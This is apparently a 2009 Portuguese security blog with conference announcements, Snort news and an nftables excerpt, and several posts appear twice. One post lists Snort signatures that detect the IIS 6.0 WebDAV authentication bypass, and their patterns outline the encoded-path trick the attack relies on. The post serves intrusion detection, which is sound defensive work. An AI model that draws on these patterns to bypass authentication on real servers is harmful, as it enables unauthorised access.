Escreva uma frase que será estampada na camiseta oficial do evento e envie para camiseta30@ysts.org até quarta, 27/05/2009.
A melhor frase ganha, inteiramente grátis, um passaporte (pessoal e intransferível) para a conferencia de segurança mais badalada do Brasil, que ocorrerá em um Bar na cidade de Sao Paulo durante o dia 22 de junho de 2009. Além disso, receberá um convite para festa VIP que ocorre no dia 23 de junho em outro bar (beba com moderação nos dois dias, hehehe).
As frases devem ter temas "geek",de preferencia em portugues. Seguem alguns exemplos:
"There's no place like 127.0.0.1"
"Bow before me, for I am root."
"No, I will not fix your computer"
Envie logo a sua frase. Aceitaremos submissões até esta quarta, 27 de maio.
2) TREINAMENTOS:
Não perca, esse ano teremos 4 treinamentos. Garanta logo a sua vaga acessando o link "inscrições" em www.ysts.org:
Introdução a Engenharia Reversa, com Luis Miras, pesquisador de segurança independente e co-autor do livro "Reverse Engineering Code with IDA Pro" (Syngress/2008).
Dismistificando Segurança em Wireless, com Luiz Eduardo e Nelson Murilo. Aprenda, com histórias da vida real, não só quebrar, mas como montar uma rede robusta.
Internet Hacking Techniques, com Felipe Balestra (parceria Conviso)
Web Hacking Techniques, com Wagner Elias (parceria Conviso)
3) GRADE:
Veja em www.ysts.org a agenda oficial do evento, que contará com as palestras a seguir, muitas delas inéditas e programadas para serem apresentadas também nas conferencias Defcon e Blackhat USA. Você vê antes, aqui no Brasil e com tradução simultânea.:
Policy - The Biscuit Game of Infosec, Jim O’Gorman
Behind the Curtain – the Microsoft Security Response Process explained, Mike Reavey: Director, MSRC
w3af - A framework to own the web, Andrés Riancho
Profiling Modern Hybrids & Threats , Derek Manky
Attacking Mobile Phone Messaging, Luis Miras e Zane Lackey
Hackeando do banheiro, Bruno Gonçalves de Oliveira
RIA Risks (Rich Internet Applications), Kevin Stadmeyer e Jon Rose
Reverse engineering and auditing extensible Microsoft subsystems and subsequent 3rd party implementations., Aaron Portnoy, DVLabs
Como Transformar uma Abotoadura em um Boné (Porque os gestores devem olhar de perto os controles técnicos de segurança), Eduardo V. C. Neves
Segurança e técnicas de intrusão em ambiente Oracle, Wendel Guglielmetti Henrique
Grato e nos vemos lá !
Willian Caprino, Nelson Murilo e Luiz Eduardo
www.ysts.org
www.naopod.com.br
Boa sorte para quem enviar a frase e quem for nos encontramos por lá! =)
Happy Hacking!
Rodrigo Montoro
Sou suspeito para falar pois apoio o You Shot The Sheriff, mas desde o primeiro ano vi a evolução do evento, e os dois primeiros foram animais, esse então a previsão é que detone. A grade foi lançada e ainda estão com uma promoção para concorrerem a um ingresso!!
1) CONCURSO CULTURAL:
Você já pediu um convite para o YSTS 3 com nossos patrocinadores e ninguem te atendeu ?
Você pensou em comprar com cartão mas o crédito está estourado ?
Você quer muito ir nessa conferência mas não sabe como ?
Seus problemas acabaram !
Escreva uma frase que será estampada na camiseta oficial do evento e envie para camiseta30@ysts.org até quarta, 27/05/2009.
A melhor frase ganha, inteiramente grátis, um passaporte (pessoal e intransferível) para a conferencia de segurança mais badalada do Brasil, que ocorrerá em um Bar na cidade de Sao Paulo durante o dia 22 de junho de 2009. Além disso, receberá um convite para festa VIP que ocorre no dia 23 de junho em outro bar (beba com moderação nos dois dias, hehehe).
As frases devem ter temas "geek",de preferencia em portugues. Seguem alguns exemplos:
"There's no place like 127.0.0.1"
"Bow before me, for I am root."
"No, I will not fix your computer"
Envie logo a sua frase. Aceitaremos submissões até esta quarta, 27 de maio.
2) TREINAMENTOS:
Não perca, esse ano teremos 4 treinamentos. Garanta logo a sua vaga acessando o link "inscrições" em www.ysts.org:
Introdução a Engenharia Reversa, com Luis Miras, pesquisador de segurança independente e co-autor do livro "Reverse Engineering Code with IDA Pro" (Syngress/2008).
Dismistificando Segurança em Wireless, com Luiz Eduardo e Nelson Murilo. Aprenda, com histórias da vida real, não só quebrar, mas como montar uma rede robusta.
Internet Hacking Techniques, com Felipe Balestra (parceria Conviso)
Web Hacking Techniques, com Wagner Elias (parceria Conviso)
3) GRADE:
Veja em www.ysts.org a agenda oficial do evento, que contará com as palestras a seguir, muitas delas inéditas e programadas para serem apresentadas também nas conferencias Defcon e Blackhat USA. Você vê antes, aqui no Brasil e com tradução simultânea.:
Policy - The Biscuit Game of Infosec, Jim O’Gorman
Behind the Curtain – the Microsoft Security Response Process explained, Mike Reavey: Director, MSRC
w3af - A framework to own the web, Andrés Riancho
Profiling Modern Hybrids & Threats , Derek Manky
Attacking Mobile Phone Messaging, Luis Miras e Zane Lackey
Hackeando do banheiro, Bruno Gonçalves de Oliveira
RIA Risks (Rich Internet Applications), Kevin Stadmeyer e Jon Rose
Reverse engineering and auditing extensible Microsoft subsystems and subsequent 3rd party implementations., Aaron Portnoy, DVLabs
Como Transformar uma Abotoadura em um Boné (Porque os gestores devem olhar de perto os controles técnicos de segurança), Eduardo V. C. Neves
Segurança e técnicas de intrusão em ambiente Oracle, Wendel Guglielmetti Henrique
Grato e nos vemos lá !
Willian Caprino, Nelson Murilo e Luiz Eduardo
www.ysts.org
www.naopod.com.br
Boa sorte para quem enviar a frase e quem for nos encontramos por lá! =)
Happy Hacking!
Rodrigo Montoro
quarta-feira, 20 de maio de 2009
Snort contra nova falha IIS 6.0 / Webdav
Saiu recentemente uma falha que permiter a elevação de privilegio ou simplesmente um bypass na autenticação do Webdav como o Bruno Gonçalves fez um otimo post no seu BLOG http://g0thacked.wordpress.com/2009/05/15/0day-bypassing-remote-webdav-auth-iis-6-0/ .
Muito se comentou da proteção sobre a falha com regras do Snort e o pessoal do Emerging Threats está testando várias opções como a citada abaixo:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
rev:1;)
Sinceramente não testei essa regra e nao sei se o consumo de performance com 2 pcre ira causar.
No site do VRT da Sourcefire simplesmente sugeriram adicionar no pré-processador de http (http_inspect) o monitoramento de ascii ou utf_8 como podem ver em http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html
UPDATE:
O VRT postou a pouco as regras abaixo para detecção:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV COPY remote authentication bypass attempt"; flow:to_server,established; content:"COPY"; http_method; pcre:"/^COPY\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:1; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPFIND remote authentication bypass attempt"; flow:to_server,established; content:"PROPFIND"; http_method; pcre:"/^PROPFIND\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:2; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPPATCH remote authentication bypass attempt"; flow:to_server,established; content:"PROPPATCH"; http_method; pcre:"/^PROPPATCH\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:3; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MKCOL remote authentication bypass attempt"; flow:to_server,established; content:"MKCOL"; http_method; pcre:"/^MKCOL\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:4; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MOVE remote authentication bypass attempt"; flow:to_server,established; content:"MOVE"; http_method; pcre:"/^MOVE\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:5; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV LOCK remote authentication bypass attempt"; flow:to_server,established; content:"LOCK"; http_method; pcre:"/^LOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:6; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV UNLOCK remote authentication bypass attempt"; flow:to_server,established; content:"UNLOCK"; http_method; pcre:"/^UNLOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:7; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV DAV remote authentication bypass attempt"; flow:to_server,established; content:"DAV"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:8; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Destination remote authentication bypass attempt"; flow:to_server,established; content:"Destination"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:9; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Depth remote authentication bypass attempt"; flow:to_server,established; content:"Depth"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:10; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV If remote authentication bypass attempt"; flow:to_server,established; content:"If"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:11; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Lock-Token remote authentication bypass attempt"; flow:to_server,established; content:"Lock-Token"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:12; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Overwrite remote authentication bypass attempt"; flow:to_server,established; content:"Overwrite"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:13; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Timeout remote authentication bypass attempt"; flow:to_server,established; content:"Timeout"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:14; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Translate remote authentication bypass attempt"; flow:to_server,established; content:"Translate"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:15; rev:1;)
Sobre o post: http://vrt-sourcefire.blogspot.com/2009/05/rules-to-detect-iis-60-webdav-exploit.html
FIM UPDATE
Mais sobre a falha com excelente explicação em: http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html
Se voce usa IIS com Webdav além do update o monitoramento é muito importante sempre.
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
Muito se comentou da proteção sobre a falha com regras do Snort e o pessoal do Emerging Threats está testando várias opções como a citada abaixo:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
rev:1;)
Sinceramente não testei essa regra e nao sei se o consumo de performance com 2 pcre ira causar.
No site do VRT da Sourcefire simplesmente sugeriram adicionar no pré-processador de http (http_inspect) o monitoramento de ascii ou utf_8 como podem ver em http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html
UPDATE:
O VRT postou a pouco as regras abaixo para detecção:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV COPY remote authentication bypass attempt"; flow:to_server,established; content:"COPY"; http_method; pcre:"/^COPY\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:1; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPFIND remote authentication bypass attempt"; flow:to_server,established; content:"PROPFIND"; http_method; pcre:"/^PROPFIND\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:2; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV PROPPATCH remote authentication bypass attempt"; flow:to_server,established; content:"PROPPATCH"; http_method; pcre:"/^PROPPATCH\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:3; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MKCOL remote authentication bypass attempt"; flow:to_server,established; content:"MKCOL"; http_method; pcre:"/^MKCOL\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:4; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV MOVE remote authentication bypass attempt"; flow:to_server,established; content:"MOVE"; http_method; pcre:"/^MOVE\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:5; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV LOCK remote authentication bypass attempt"; flow:to_server,established; content:"LOCK"; http_method; pcre:"/^LOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:6; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV UNLOCK remote authentication bypass attempt"; flow:to_server,established; content:"UNLOCK"; http_method; pcre:"/^UNLOCK\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:7; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV DAV remote authentication bypass attempt"; flow:to_server,established; content:"DAV"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:8; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Destination remote authentication bypass attempt"; flow:to_server,established; content:"Destination"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:9; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Depth remote authentication bypass attempt"; flow:to_server,established; content:"Depth"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:10; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV If remote authentication bypass attempt"; flow:to_server,established; content:"If"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:11; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Lock-Token remote authentication bypass attempt"; flow:to_server,established; content:"Lock-Token"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:12; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Overwrite remote authentication bypass attempt"; flow:to_server,established; content:"Overwrite"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:13; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Timeout remote authentication bypass attempt"; flow:to_server,established; content:"Timeout"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:14; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-IIS Microsoft IIS 6.0 WebDAV Translate remote authentication bypass attempt"; flow:to_server,established; content:"Translate"; http_header; nocase; pcre:"/^[A-Z]+\s+[^\x0a]*?(\x25[89A-F][0-9A-F])/si"; reference:url,www.microsoft.com/technet/security/advisory/971492.mspx; reference:cve,2009-1676; classtype:attempted-user; sid:15; rev:1;)
Sobre o post: http://vrt-sourcefire.blogspot.com/2009/05/rules-to-detect-iis-60-webdav-exploit.html
FIM UPDATE
Mais sobre a falha com excelente explicação em: http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html
Se voce usa IIS com Webdav além do update o monitoramento é muito importante sempre.
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
quinta-feira, 30 de abril de 2009
[FUN] Snort contra a gripe suina
Minha amiga e ex-colega de trabalho Marcela Daniotti fez uma montagem excelente do nosso querido mascote do snort.
Valeu Marcela!! Merece um post hehehe!
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 27 de abril de 2009
Treinamento Completo snort em português
Caros,
A Dynsec (http://www.dynsec.com.br - empresa do qual sou sócio) , empresa especializada em Detecção de Intrusos, vem através desse comunicar o lançamento do treinamento não oficial sobre Snort IDS. O treinamento acontecerá em parceria com a CLM (http://www.clm.com.br), distribuidora exclusiva da Sourcefire no Brasil. O treinamento será baseado na versão atual do PDF do snort.org, visando manter a qualidade e o caráter atual do curso.
Público Alvo:
- Estudantes
- Administradores de Redes
- Analistas de Segurança
Carga horária: 40 horas
Estão inclusos no curso:
- Manual impresso Snort
- Slides do treinamento para anotações
- Material para laboratório hands-on
- Coffee Break
Local: CLM – Av. Ibirapuera, 2120, cj 95 – São Paulo – SP
Data: 15 a 19 de junho
Horário: 09:00 as 18:00
Maiores informações: http://blog.dynsec.com.br/2009/04/26/treinamento-completo-snort/
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
A Dynsec (http://www.dynsec.com.br - empresa do qual sou sócio) , empresa especializada em Detecção de Intrusos, vem através desse comunicar o lançamento do treinamento não oficial sobre Snort IDS. O treinamento acontecerá em parceria com a CLM (http://www.clm.com.br), distribuidora exclusiva da Sourcefire no Brasil. O treinamento será baseado na versão atual do PDF do snort.org, visando manter a qualidade e o caráter atual do curso.
Público Alvo:
- Estudantes
- Administradores de Redes
- Analistas de Segurança
Carga horária: 40 horas
Estão inclusos no curso:
- Manual impresso Snort
- Slides do treinamento para anotações
- Material para laboratório hands-on
- Coffee Break
Local: CLM – Av. Ibirapuera, 2120, cj 95 – São Paulo – SP
Data: 15 a 19 de junho
Horário: 09:00 as 18:00
Maiores informações: http://blog.dynsec.com.br/2009/04/26/treinamento-completo-snort/
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
quinta-feira, 9 de abril de 2009
Upgrade OBRIGATÓRIO para Snort 2.8.4
Caros,
Acredito que muitos utilizem snort e mantenham as regras atualizadas com as regras do VRT. Como postei anteriormente (http://spookerlabs.blogspot.com/2009/02/novo-pre-processador-dcerpc2-e-ruleset.html) a Sourcefire visando melhorar desempenho e capacidade de detecção de problemas de smb/dcerpc/netbios lançou o novo pré processador dcerpc v2 ou dcerpc2.
Como citado no outro post com vários links ele diminuira muito a quantidade de regras de netbios porém ele terá mais complexibilidade de configuração e o metodo de escrita de regras será um pouco diferente.
Esse post tem o intuito de avisar que voce SOMENTE conseguirá ter as REGRAS MAIS ATUALIZADAS se fizer o update para o snort 2.8.4 e configurar seu pré-processador DCERPC2.
Deem uma olhada nesse posts da Sourcefire
"This release updates the VRT Certified Snort Rules to utilize the new DCE/RPC v2 preprocessor. This change deletes more than 5000 rules in the netbios rule category and replaces them with a much smaller rule set. It aslo contains additional detection for hosts that are currently infected with the Conficker worm. "
http://www.snort.org/vrt/advisories/vrt-rules-2009-04-08.html
Vejam tambem
http://vrt-sourcefire.blogspot.com/2009/04/snort-284-is-nigh.html
ATUALIZEM seus snort para 2.8.4 o mais rapido possivel, logicamente entendam o dcerpc2 antes =)
* When downloading rules it is important to note that the 2.8 subscription release is for Snort version 2.8.4 and these rules WILL NOT work with older versions of Snort. This includes 2.8.3 and earlier. In 30 days time, these packages will be rolled over to registered users, when this happens the registered user rule tarballs will also contain the changes to the netbios rule set.
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
Acredito que muitos utilizem snort e mantenham as regras atualizadas com as regras do VRT. Como postei anteriormente (http://spookerlabs.blogspot.com/2009/02/novo-pre-processador-dcerpc2-e-ruleset.html) a Sourcefire visando melhorar desempenho e capacidade de detecção de problemas de smb/dcerpc/netbios lançou o novo pré processador dcerpc v2 ou dcerpc2.
Como citado no outro post com vários links ele diminuira muito a quantidade de regras de netbios porém ele terá mais complexibilidade de configuração e o metodo de escrita de regras será um pouco diferente.
Esse post tem o intuito de avisar que voce SOMENTE conseguirá ter as REGRAS MAIS ATUALIZADAS se fizer o update para o snort 2.8.4 e configurar seu pré-processador DCERPC2.
Deem uma olhada nesse posts da Sourcefire
"This release updates the VRT Certified Snort Rules to utilize the new DCE/RPC v2 preprocessor. This change deletes more than 5000 rules in the netbios rule category and replaces them with a much smaller rule set. It aslo contains additional detection for hosts that are currently infected with the Conficker worm. "
http://www.snort.org/vrt/advisories/vrt-rules-2009-04-08.html
Vejam tambem
http://vrt-sourcefire.blogspot.com/2009/04/snort-284-is-nigh.html
ATUALIZEM seus snort para 2.8.4 o mais rapido possivel, logicamente entendam o dcerpc2 antes =)
* When downloading rules it is important to note that the 2.8 subscription release is for Snort version 2.8.4 and these rules WILL NOT work with older versions of Snort. This includes 2.8.3 and earlier. In 30 days time, these packages will be rolled over to registered users, when this happens the registered user rule tarballs will also contain the changes to the netbios rule set.
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
terça-feira, 31 de março de 2009
Podcast Nacional de Segurança - [i shot the sheriff] Edição 64 - 30/03/2009
Saiu mais uma edição do podcast I shot the sheriff com 1 hora de duracao . Com certeza vale a pena escutar =)
Eventos
25C3 - Unofficial Video Recordings
Toorcamp Call For Participation!
Workshop on the Analysis of System Logs (WASL) 2009 CFP
SOURCE Barcelona 2009 call for papers
Chamada de Trabalhos - GTS-13 Sao Paulo - 19 e 20 de junho de 2009
Slides from uCon Security Conference 2009 available online
Deepsec CFP
Noticias
Rigged podcasts can leak your iTunes username/password
Justiça suspende prisão de gêmeos porque não sabe qual é o culpado
YSTS CFP and updates
Lançado sistema de votação pela Internet criptografado, seguro e verificável
The emerging science of DNA cryptography
Eventos
25C3 - Unofficial Video Recordings
Toorcamp Call For Participation!
Workshop on the Analysis of System Logs (WASL) 2009 CFP
SOURCE Barcelona 2009 call for papers
Chamada de Trabalhos - GTS-13 Sao Paulo - 19 e 20 de junho de 2009
Slides from uCon Security Conference 2009 available online
Deepsec CFP
Noticias
Rigged podcasts can leak your iTunes username/password
Justiça suspende prisão de gêmeos porque não sabe qual é o culpado
YSTS CFP and updates
Lançado sistema de votação pela Internet criptografado, seguro e verificável
The emerging science of DNA cryptography
Para ouvir: http://www.naopod.com.br
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 23 de março de 2009
Antebellum sobre PCI - Revista ISSA Brasil - edição 06
A edição março/abril da Antebellum já está disponível no site da ISSA Brasil:
A Antebellum é a revista eletrônica bimestral da ISSA Capítulo Brasil. A edição deste mês tem, como tema de capa, o padrão PCI-DSS e conta com diversos artigos sobre este e outros assuntos de grande interesse da comunidade de segurança:
- Data Security Standard
- As Vulnerabilidades no POS
- Para inglês ver?
- Conformidade: por onde começar?
- ISO/IEC 15.408 não é para desenvolvimento seguro
- Terceirização: Uma análise do ponto de vista de Segurança da Informação
- Microsoft Forefront Threat Management Gateway (TMG)
- Segurança da Informação em Tempos de Crise
- Você está preparado para o CISSP?
- Segurança no Windows 7
- A Privacidade como Limitador do Monitoramento Digital
Com o apoio da CLM (www.clm.com.br), criamos uma versão especial impressa dessa edição, que foi entregue para os participantes do ISSA Day de Março (realizado em 19/03) e que ainda iremos distribuir excusivamente nos próximos eventos da ISSA Brasil.
Excepcionalmente, não lançamos uma edição da revista no início do ano, referente aos meses de Janeiro e Fevereiro. Assim, a revista atual, de número 06, se tornou a primeira edição deste ano.
A próxima edição da Antebellum, para os meses de Maio e Junho, terá como tema central a Segurança de Aplicações, e estamos aceitando artigos até o dia 02/04. Colabore, envie sua contribuição para nós.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
domingo, 22 de março de 2009
nftables - sucessor iptables ?
Li sobre um novo projeto dos desenvolvedores do netfilter que me parece MUITO interessante. O projeto é chamada de nftables (versão alpha ainda) e segunda o release acredito que num futuro venha a "substituir" o bom e velho iptables =). Abaixo algumas partes do release :
Fonte completa: http://thread.gmane.org/gmane.comp.security.firewalls.netfilter.devel/28922
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
There are three main components:
- the kernel implementation
- libnl netlink communication
- nftables userspace frontend
At this point a few example might be in order ...
- a single rule, specified incrementally on the command line:
# nft add rule output tcp dport 22 log accept
The default address family is IPv4, the default table is filter. The
full specification would look like this:
# nft add rule inet filter output tcp dport 22 log accept
- a chain containing multiple rules:
#! nft -f
include "ipv4-filter"
chain filter output {
ct state established,related accept
tcp dport 22 accept
counter drop
}
creates the filter table based on the definitions from "ipv4-filter"
and populates the output chain with the given three rules.
OK, back to the internals. After the input has been parsed, it is
evaluated. This stage performs some basic transformations, like
constant folding and propagation, as well as most semantic checks.
During this step, a protocol context is built based on the current
address family and the specified matches, which describes the protocols
of packets that might hit later operations in the same rule. This
allows two things:
- conflict detection:
... ip protocol tcp udp dport 53
results in:
:1:37-45: Error: conflicting protocols specified: tcp vs. udp
add filter output ip protocol tcp udp dport 53
^^^^^^^^^
Fonte completa: http://thread.gmane.org/gmane.comp.security.firewalls.netfilter.devel/28922
Happy Hacking!
